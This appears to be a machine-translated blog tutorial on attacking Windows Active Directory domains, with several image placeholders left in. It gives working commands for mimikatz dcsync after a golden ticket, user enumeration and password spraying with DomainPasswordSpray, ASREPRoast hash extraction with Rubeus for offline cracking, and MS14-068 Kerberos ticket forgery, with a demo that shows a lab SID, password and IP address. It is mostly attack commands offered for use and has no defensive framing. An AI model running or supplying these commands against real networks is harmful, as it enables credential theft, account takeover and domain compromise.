intra-domain attack

kerberos attack

Use golden ticket + dcsync to get password

Get the Golden Ticket First
get password

lsadump::dcsync /user:用户 /domain:域名称

success

Domain user, password enumeration

tool

user enumeration

import first

Import-Module .\DomainPasswordSpray.ps1
then execute

Get-DomainUserList -Domain domainname -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt

result

insert image description here

view userlist

insert image description here

password spray

implement

Invoke-DomainPasswordSpray -Domain domainname -Password Passw0rd@ -OutFile pass.txt

That is, use Passw0rd@ to compare with the user password in the domain, and return if successful (a bit tasteless)

ASREPRoast

The ASREPRoast attack looks for users who do not require Kerberos domain authentication. This means that anyone can send AS_REQ requests to the KDC and receive AS REP messages on behalf of any of these users. The last type of message contains a block of data encrypted with the original user key, which is derived from its password. Then, by using this message, the user password can be cracked offline.

tool

use

get hash

Rubeus.exe asreproast /format:john /outfile: hashes.txt

This command will store the extracted hash value in a txt file in a format that John’s tool can crack
Then you can use john to crack

Intra-domain privilege escalation

MS14-068

Prerequisites

Unpatched (KB3011780)
a domain machine
has its sid and password

tool

use

Generate a fake certificate

MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>

demo

get sid

whoami /user

insert image description here

mimikatz grab domain password

catch if you don't know
Generate fake kerberos certificates

MS14-068.exe -u [email protected] -p user2008. -s S-1-5-21-1031516656-1656020465-3194443236-1140 -d 192.168.95.10

insert image description here